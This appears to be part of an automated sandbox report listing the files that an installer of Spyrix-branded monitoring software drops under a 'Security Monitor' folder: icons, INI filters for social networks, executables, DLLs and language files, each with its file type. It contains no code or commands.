C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\imp.free.fr.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\instagram.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-07QHH.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-2JVSN.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-2TTRE.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-3OLB7.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-3TAFS.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-48PES.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-6LKCL.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-8NBV5.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-BQELM.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-DIE9M.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-E47BI.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-E9CVV.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-F6LJG.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-FLQ9H.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-FM5FR.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-JAAI0.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-LNKG9.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-PJQCK.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-PU2SN.tmp
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-RJRR9.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-TQMOT.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-UEDQF.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-UL3V4.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-VO1I9.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\linkedin.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\mail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\mail.png (copy)
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\messagerie.orange.fr.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\my.screenname.aol.com.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\myspace.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\odnoklassniki.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\qqzone.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\twitter.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\twitter_.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\vkontakte.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\youtube.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\SNets.ini (copy)
Generic INItialization configuration [Instagram]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\default.ini (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki.ini (copy)
Generic INItialization configuration [Marks]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\About.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Friends.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Guests.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Marks.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Photos.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Profiles.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-2957B.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-4L2RG.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-68427.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-BBKC6.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-DHFK7.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-J6TAL.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte.ini (copy)
Generic INItialization configuration [Friends]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Friends.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Messages.png (copy)
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Notifications.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Replies.png (copy)
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-8O74N.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-ECPEG.tmp
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-G4A24.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-OMNCV.tmp
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook.ini (copy)
Generic INItialization configuration [News]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Apps.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Events.png (copy)
PNG image data, 15 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Facebook Ads.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Find friends.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Friends List.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Friends.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Gifts.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Groups.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Invite friends.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Messages.png (copy)
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\News.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Notifications.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Payments.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Privacy.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Security.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Settings.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Subscribers.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Welcome.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-0KNDI.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-3QASK.tmp
PNG image data, 15 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-48GKB.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-6R7T7.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-AN4OF.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-BSOFR.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-DD09A.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-DVK2C.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-EA13V.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-FHUQ2.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-FT54P.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-HTC07.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-IF041.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-ISATB.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-JIDC9.tmp
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-JQ20S.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-PJPPP.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-QPRL4.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\is-4PJ4H.tmp
Generic INItialization configuration [Friends]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\is-ACPUD.tmp
Generic INItialization configuration [Marks]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\is-IMKB1.tmp
Generic INItialization configuration [News]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\is-7MDVH.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\is-FCREC.tmp
Generic INItialization configuration [Instagram]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\ru\default.ini (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\ru\is-UBBKJ.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\zh\default.ini (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\zh\is-D57HS.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SearchEn\SearchEn.ini (copy)
Generic INItialization configuration [Bing]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SearchEn\is-D4I3D.tmp
Generic INItialization configuration [Bing]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\is-DR9RM.tmp
Unicode text, UTF-8 (with BOM) text, with very long lines (4429), with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\url_cat (copy)
Unicode text, UTF-8 (with BOM) text, with very long lines (4429), with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\iMsgInfo.bmp (copy)
PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\id.cmd (copy)
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-0USI1.tmp
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-2D6JG.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-3UVHQ.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-5RI0Q.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-A237A.tmp
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-AHV7G.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-AJOVR.tmp
PNG image data, 197 x 285, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-BDDH1.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-CC63N.tmp
MS Windows 95 Internet shortcut text (URL=<"https://dashboard.spyrix.com">), ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ESRQU.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-FUVBN.tmp
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-H0VIM.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-HGCLM.tmp
ASCII text, with very long lines (382), with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-I5RH2.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ISTUF.tmp
PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-J5DND.tmp
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JF9SV.tmp
MS Windows icon resource - 7 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-M06NF.tmp
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-NE9RG.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-NIDOR.tmp
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, xresolution=98, yresolution=106, resolutionunit=2, software=paint.net 4.0.10], baseline, precision 8, 320x240, components 3
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-OQK9A.tmp
MS Windows 95 Internet shortcut text (URL=<"https://www.spyrix.com/purchase.php?from=sfk_uninstall">), ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-SE2BH.tmp
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-T1Q7P.tmp
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-T6149.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-UVC43.tmp
MS Windows 95 Internet shortcut text (URL=<"http://www.spyrix.com/spyrix-products.php?from=sfk_install">), ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
